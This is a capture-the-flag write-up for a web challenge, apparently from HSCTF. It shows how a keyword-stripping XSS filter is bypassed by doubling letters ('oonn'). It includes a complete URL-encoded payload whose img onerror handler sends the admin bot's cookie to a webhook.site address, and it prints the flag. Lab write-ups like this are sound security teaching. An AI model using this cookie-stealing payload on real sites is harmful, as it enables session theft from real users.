Tags: web xss 

Rating:

The writeup starts at 3:40 on the video. The source code was provided for this challenge:
```
import { default as Arg } from "https://cdn.jsdelivr.net/npm/@vunamhung/[email protected]/+esm";

function sanitize(content) {
return content.replace(/script|on|iframe|object|embed|cookie/gi, "");
}

let title = document.getElementById("title");
let content = document.getElementById("content");

function display() {
title.textContent = Arg("title");
document.title = Arg("title");

let sanitized = sanitize(Arg("content"));
content.innerHTML = sanitized;

document.body.style.backgroundColor = Arg("background_color");
document.body.style.color = Arg("color");
document.body.style.fontFamily = Arg("font");
content.style.fontSize = Arg("font_size") + "px";
}

display();
```
The sanitization on the content parameter can be bypassed by using the follow technique "oonn" => "on". Following this logic we can do the following:
```

```
If we submit the above content payload, we get the following url:
```
http://fancy-page.hsctf.com/display.html?title=a&content=%3Cimg%20src%3Dx%20oonnerror%3D%27document.locatioonn%3D%22https%3A%2F%2Fwebhook.site%2Ff202667e-9179-425d-80c1-fd62da5915d4%3F%22%2Bdocument.ccookieookie%27%3E&background_color=%23ffffff&color=%23000000&font=Helvetica&font_size=16
```
If we submit this to the admin bot to visit we get the flag (that was on the admin bot cookie) on the webhook.site:
```
flag{filter_fail}
```

Original writeup (https://youtu.be/QKZWyWQSPaw?t=220).